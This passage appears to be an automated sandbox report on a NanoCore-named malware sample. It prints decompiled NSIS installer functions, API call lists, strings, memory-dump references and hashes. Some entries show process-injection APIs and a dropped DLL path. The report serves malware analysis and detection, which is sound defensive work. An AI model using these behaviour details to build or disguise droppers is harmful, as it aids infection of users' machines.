            • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
              • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
              • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
            • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
            Strings
            • "C:\Users\user\Desktop\nanocore.exe" , xrefs: 00402C41
            • verifying installer: %d%%, xrefs: 00402D89
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
            • Error launching installer, xrefs: 00402C8D
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
            • Null, xrefs: 00402D2F
            • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
            • Inst, xrefs: 00402D19
            • soft, xrefs: 00402D26
            • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
            • API String ID: 2181728824-3138192003
            • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
            • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 57%
            			E0040179D(FILETIME* __ebx, void* __eflags) {
            				void* _t33;
            				void* _t41;
            				void* _t43;
            				long _t49;
            				long _t62;
            				signed char _t63;
            				long _t64;
            				void* _t66;
            				long _t72;
            				FILETIME* _t73;
            				FILETIME* _t77;
            				signed int _t79;
            				void* _t82;
            				CHAR* _t84;
            				void* _t87;
            
            				_t77 = __ebx;
            				_t84 = E00402A9A(0x31);
            				 *(_t87 - 0x34) = _t84;
            				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
            				_t33 = E00405538(_t84);
            				_push(_t84);
            				if(_t33 == 0) {
            					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
            				} else {
            					_push(0x409c18);
            					E004059BF();
            				}
            				E00405BFB(0x409c18);
            				while(1) {
            					__eflags =  *(_t87 + 8) - 3;
            					if( *(_t87 + 8) >= 3) {
            						_t66 = E00405C94(0x409c18);
            						_t79 = 0;
            						__eflags = _t66 - _t77;
            						if(_t66 != _t77) {
            							_t73 = _t66 + 0x14;
            							__eflags = _t73;
            							_t79 = CompareFileTime(_t73, _t87 - 0x18);
            						}
            						asm("sbb eax, eax");
            						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
            						__eflags = _t72;
            						 *(_t87 + 8) = _t72;
            					}
            					__eflags =  *(_t87 + 8) - _t77;
            					if( *(_t87 + 8) == _t77) {
            						_t63 = GetFileAttributesA(0x409c18); // executed
            						_t64 = _t63 & 0x000000fe;
            						__eflags = _t64;
            						SetFileAttributesA(0x409c18, _t64); // executed
            					}
            					__eflags =  *(_t87 + 8) - 1;
            					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
            					__eflags = _t41 - 0xffffffff;
            					 *(_t87 - 8) = _t41;
            					if(_t41 != 0xffffffff) {
            						break;
            					}
            					__eflags =  *(_t87 + 8) - _t77;
            					if( *(_t87 + 8) != _t77) {
            						E00404D62(0xffffffe2,  *(_t87 - 0x34));
            						__eflags =  *(_t87 + 8) - 2;
            						if(__eflags == 0) {
            							 *((intOrPtr*)(_t87 - 4)) = 1;
            						}
            						L31:
            						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
            						__eflags =  *0x7a3008;
            						goto L32;
            					} else {
            						E004059BF(0x40a418, 0x7a4000);
            						E004059BF(0x7a4000, 0x409c18);
            						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll",  *((intOrPtr*)(_t87 - 0x10)));
            						E004059BF(0x7a4000, 0x40a418);
            						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll",  *(_t87 - 0x24) >> 3) - 4;
            						__eflags = _t62;
            						if(_t62 == 0) {
            							continue;
            						} else {
            							__eflags = _t62 == 1;
            							if(_t62 == 1) {
            								 *0x7a3008 =  *0x7a3008 + 1;
            								L32:
            								_t49 = 0;
            								__eflags = 0;
            							} else {
            								_push(0x409c18);
            								_push(0xfffffffa);
            								E00404D62();
            								L29:
            								_t49 = 0x7fffffff;
            							}
            						}
            					}
            					L33:
            					return _t49;
            				}
            				E00404D62(0xffffffea,  *(_t87 - 0x34));
            				 *0x4092a0 =  *0x4092a0 + 1;
            				_push(_t77);
            				_push(_t77);
            				_push( *(_t87 - 8));
            				_push( *((intOrPtr*)(_t87 - 0x1c)));
            				_t43 = E00402EBD(); // executed
            				 *0x4092a0 =  *0x4092a0 - 1;
            				__eflags =  *(_t87 - 0x18) - 0xffffffff;
            				_t82 = _t43;
            				if( *(_t87 - 0x18) != 0xffffffff) {
            					L22:
            					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
            				} else {
            					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
            					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
            						goto L22;
            					}
            				}
            				FindCloseChangeNotification( *(_t87 - 8)); // executed
            				__eflags = _t82 - _t77;
            				if(_t82 >= _t77) {
            					goto L31;
            				} else {
            					__eflags = _t82 - 0xfffffffe;
            					if(_t82 != 0xfffffffe) {
            						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
            					} else {
            						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
            						lstrcatA(0x409c18,  *(_t87 - 0x34));
            					}
            					_push(0x200010);
            					_push(0x409c18);
            					E004052BF();
            					goto L29;
            				}
            				goto L33;
            			}


            APIs
            • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
            • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
            • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
            • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll$Ivlfdpdlcleoxmzl
            • API String ID: 1152937526-711476632
            • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
            • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
            				struct _OVERLAPPED* _v8;
            				long _v12;
            				void* _v16;
            				long _v20;
            				long _v24;
            				intOrPtr _v28;
            				char _v92;
            				void* _t68;
            				void* _t69;
            				int _t74;
            				long _t75;
            				intOrPtr _t79;
            				long _t80;
            				void* _t82;
            				int _t84;
            				void* _t99;
            				void* _t100;
            				long _t101;
            				int _t102;
            				long _t103;
            				int _t104;
            				intOrPtr _t105;
            				long _t106;
            				void* _t107;
            
            				_t102 = _a16;
            				_t99 = _a12;
            				_v12 = _t102;
            				if(_t99 == 0) {
            					_v12 = 0x8000;
            				}
            				_v8 = 0;
            				_v16 = _t99;
            				if(_t99 == 0) {
            					_v16 = 0x78d938;
            				}
            				_t66 = _a4;
            				if(_a4 >= 0) {
            					E004030FF( *0x7a2fd8 + _t66);
            				}
            				_t68 = E004030CD( &_a16, 4); // executed
            				if(_t68 == 0) {
            					L44:
            					_push(0xfffffffd);
            					goto L45;
            				} else {
            					if((_a19 & 0x00000080) == 0) {
            						if(_t99 != 0) {
            							if(_a16 < _t102) {
            								_t102 = _a16;
            							}
            							if(E004030CD(_t99, _t102) != 0) {
            								_v8 = _t102;
            								L47:
            								return _v8;
            							} else {
            								goto L44;
            							}
            						}
            						if(_a16 <= 0) {
            							goto L47;
            						}
            						while(1) {
            							_t103 = _v12;
            							if(_a16 < _t103) {
            								_t103 = _a16;
            							}
            							if(E004030CD(0x789938, _t103) == 0) {
            								goto L44;
            							}
            							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
            							if(_t74 == 0 || _t103 != _a12) {
            								L30:
            								_push(0xfffffffe);
            								L45:
            								_pop(_t69);
            								return _t69;
            							} else {
            								_v8 = _v8 + _t103;
            								_a16 = _a16 - _t103;
            								if(_a16 > 0) {
            									continue;
            								}
            								goto L47;
            							}
            						}
            						goto L44;
            					}
            					_t75 = GetTickCount();
            					_t13 =  &_a16;
            					 *_t13 = _a16 & 0x7fffffff;
            					_v20 = _t75;
            					 *0x40b038 = 0xb;
            					 *0x40b050 = 0;
            					_a4 = _a16;
            					if( *_t13 <= 0) {
            						goto L47;
            					}
            					while(1) {
            						L10:
            						_t104 = 0x4000;
            						if(_a16 < 0x4000) {
            							_t104 = _a16;
            						}
            						if(E004030CD(0x789938, _t104) == 0) {
            							goto L44;
            						}
            						_a16 = _a16 - _t104;
            						 *0x40b028 = 0x789938;
            						 *0x40b02c = _t104;
            						while(1) {
            							_t100 = _v16;
            							 *0x40b030 = _t100;
            							 *0x40b034 = _v12;
            							_t79 = E00405D9D(0x40b028);
            							_v28 = _t79;
            							if(_t79 < 0) {
            								break;
            							}
            							_t105 =  *0x40b030; // 0x78ed38
            							_t106 = _t105 - _t100;
            							_t80 = GetTickCount();
            							_t101 = _t80;
            							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
            								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
            								_t107 = _t107 + 0xc;
            								E00404D62(0,  &_v92);
            								_v20 = _t101;
            							}
            							if(_t106 == 0) {
            								if(_a16 > 0) {
            									goto L10;
            								}
            								goto L47;
            							} else {
            								if(_a12 != 0) {
            									_v12 = _v12 - _t106;
            									_v8 = _v8 + _t106;
            									_t82 =  *0x40b030; // 0x78ed38
            									_v16 = _t82;
            									if(_v12 < 1) {
            										goto L47;
            									}
            									L25:
            									if(_v28 != 4) {
            										continue;
            									}
            									goto L47;
            								}
            								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
            								if(_t84 == 0 || _v24 != _t106) {
            									goto L30;
            								} else {
            									_v8 = _v8 + _t106;
            									goto L25;
            								}
            							}
            						}
            						_push(0xfffffffc);
            						goto L45;
            					}
            					goto L44;
            				}
            			}


            APIs
            • GetTickCount.KERNEL32 ref: 00402F1F
            • GetTickCount.KERNEL32 ref: 00402FA6
            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
            • wsprintfA.USER32 ref: 00402FE3
            • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$8x
            • API String ID: 4209647438-795837185
            • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
            • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02CB1520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02CB157F
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: bf149401fb7660f5dc6fb3a2d0fd73a4d39376053a2a554119c0ce443599f169
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: A9E16931E44388EDEF21CBE4EC15BEDBBB5AF04710F14409AE608FA191D7B50A85DB16
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02CB081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02CB09E8
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 300171d7ec85151e9a4f5608d859f949f46ca87c86e6865e1f40e4c4e8d61333
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 41A1FE34D00249EFEF12CFE4D885BEEBBB1AF18316F20845AE515BA2A0D7755A81DF10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
            				int _t19;
            				struct _SECURITY_ATTRIBUTES* _t20;
            				signed char _t22;
            				struct _SECURITY_ATTRIBUTES* _t23;
            				CHAR* _t25;
            				struct _SECURITY_ATTRIBUTES** _t27;
            				struct _SECURITY_ATTRIBUTES** _t29;
            				void* _t30;
            
            				_t23 = __ebx;
            				_t25 = E00402A9A(0xfffffff0);
            				_t27 = E0040555F(_t25);
            				if( *_t25 != __ebx && _t27 != __ebx) {
            					do {
            						_t29 = E004054F7(_t27, 0x5c);
            						 *_t29 = _t23;
            						 *((char*)(_t30 + 0xb)) =  *_t29;
            						_t19 = CreateDirectoryA(_t25, _t23); // executed
            						if(_t19 == 0) {
            							if(GetLastError() != 0xb7) {
            								L5:
            								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
            							} else {
            								_t22 = GetFileAttributesA(_t25); // executed
            								if((_t22 & 0x00000010) == 0) {
            									goto L5;
            								}
            							}
            						}
            						_t20 =  *((intOrPtr*)(_t30 + 0xb));
            						 *_t29 = _t20;
            						_t27 =  &(_t29[0]);
            					} while (_t20 != _t23);
            				}
            				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
            					_push(0xfffffff5);
            					E00401428();
            				} else {
            					E00401428(0xffffffe6);
            					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
            					SetCurrentDirectoryA(_t25); // executed
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
            				return 0;
            			}

            APIs
              • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040556D
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-47812868
            • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
            • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
            				signed int _t11;
            				int _t14;
            				signed int _t16;
            				void* _t19;
            				CHAR* _t20;
            
            				_t20 = _a4;
            				_t19 = 0x64;
            				while(1) {
            					_t19 = _t19 - 1;
            					_a4 = 0x61736e;
            					_t11 = GetTickCount();
            					_t16 = 0x1a;
            					_a6 = _a6 + _t11 % _t16;
            					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
            					if(_t14 != 0) {
            						break;
            					}
            					if(_t19 != 0) {
            						continue;
            					}
            					 *_t20 =  *_t20 & 0x00000000;
            					return _t14;
            				}
            				return _t20;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 004056D2
            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\nanocore.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
            • nsa, xrefs: 004056CB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
            • API String ID: 1716503409-3657371456
            • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
            • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02CB0387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02CB03AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CB03CE
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: 01d20345cfe282516aa3efc90a2496fdb251b9222e4999a0c22c2eee8a04846a
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 06321731E40258EFEB21CBA4DC55BEEB7B5BF48705F20409AE608FA2A0D7705A85DF15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E0040136D(signed int _a4) {
            				intOrPtr* _t8;
            				int _t10;
            				signed int _t12;
            				int _t13;
            				int _t14;
            				signed int _t21;
            				int _t24;
            				signed int _t27;
            				void* _t28;
            
            				_t27 = _a4;
            				while(_t27 >= 0) {
            					_t8 = _t27 * 0x1c +  *0x7a2fb0;
            					__eflags =  *_t8 - 1;
            					if( *_t8 == 1) {
            						break;
            					}
            					_push(_t8); // executed
            					_t10 = E00401439(); // executed
            					__eflags = _t10 - 0x7fffffff;
            					if(_t10 == 0x7fffffff) {
            						return 0x7fffffff;
            					}
            					__eflags = _t10;
            					if(__eflags < 0) {
            						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
            						__eflags = _t10;
            					}
            					if(__eflags != 0) {
            						_t12 = _t10 - 1;
            						_t21 = _t27;
            						_t27 = _t12;
            						_t13 = _t12 - _t21;
            						__eflags = _t13;
            					} else {
            						_t13 = 1;
            						_t27 = _t27 + 1;
            					}
            					__eflags =  *(_t28 + 0xc);
            					if( *(_t28 + 0xc) != 0) {
            						 *0x7a276c =  *0x7a276c + _t13;
            						_t14 =  *0x7a2754;
            						__eflags = _t14;
            						_t24 = (0 | _t14 == 0x00000000) + _t14;
            						__eflags = _t24;
            						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
            					}
            				}
            				return 0;
            			}

            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
            • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
